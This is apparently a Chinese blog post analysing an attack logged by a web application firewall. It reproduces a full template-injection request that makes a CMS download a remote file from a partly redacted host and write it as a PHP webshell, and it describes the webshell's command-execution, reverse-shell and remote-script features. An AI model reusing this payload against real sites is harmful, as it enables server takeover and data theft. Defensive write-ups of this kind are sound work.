Skip to main content

记一次网站防护功能

8/20/25About 2 min

记一次网站防护功能

最近在waf后台上看到这个,于是好奇来分析一下

部分字符使用XX代替。

GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/complile/003.php&t2=file_get_contents&t3=http://XXXXXXXXXXX.cn/app/index/taglib/ote.txt HTTP/1.1
user-agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
eagleeye-traceid: a3b5239717551577503652798e
ali-swift-log-host: m.XX.com
ali-cdn-real-ip: 103.XX.XX.144
x-forwarded-for: 103.XX.XX.144
content-type: application/x-www-form-urlencoded
ali-cdn-forward-client-ip: 103.XX.XX.144
ali-swift-stat-host: m.XX.com
accept-encoding: gzip, deflate
host: m.XX.com
accept: */*
x-client-scheme: http
via: hk34.l1, ens-cache10.hk34, l2hk12.l2, ens-cache35.l2hk12
waf-intercept-client-ip-port: 103.XX.XX.144:40895

img

于是在浏览器访问,获取到了一些PHP代码。

http://XXXXXXXXXXX.cn/app/index/taglib/ote.txt
打开这个首页是一个企业站,应该是这个企业站被挂马了。

image-20250814165558987

丢个ChatGPT分析一下代码ote.txt

攻击目的

这是标准的远程文件写入 + WebShell 植入手法:

利用 CMS 模板解析执行任意 PHP 函数(file_put_contents + file_get_contents)。

把攻击者控制的 PHP 代码写到本地一个可访问位置。

后续可以通过访问 runtime/complile/003.php 来远程执行命令,完全控制服务器。

模板最终执行效果等价于:

file_put_contents(
    'runtime/XXX/003.php',
    file_get_contents('http://XXXXXXXXXXX.cn/XXX/XX/taglib/ote.txt')
);

部署方式

  • 攻击者通过漏洞(如你之前提到的模板标签 RCE)下载并保存 ote.txt 到服务器
  • 再利用解析漏洞或改名方式让 .txt 被当作 PHP 执行

功能模块(常见于 OteTeam 大马):

  1. 文件管理(浏览、上传、下载、删除、修改权限)
  2. 数据库管理(执行 SQL、导入导出)
  3. 命令执行(直接运行系统命令)
  4. 连接反弹(反弹 Shell 到攻击者主机)
  5. 插件扩展(加载更多恶意模块)

输出恶意标签

尾部

$str="XXXXXX";
echo base64_decode($str);
解码后为:

html

<sCripT sRC=//XXXXXXXX></sCrIpT>

这会在页面中加载远程 JS(可能进行二次攻击或窃取信息)。

Last Updated:
Contributors: star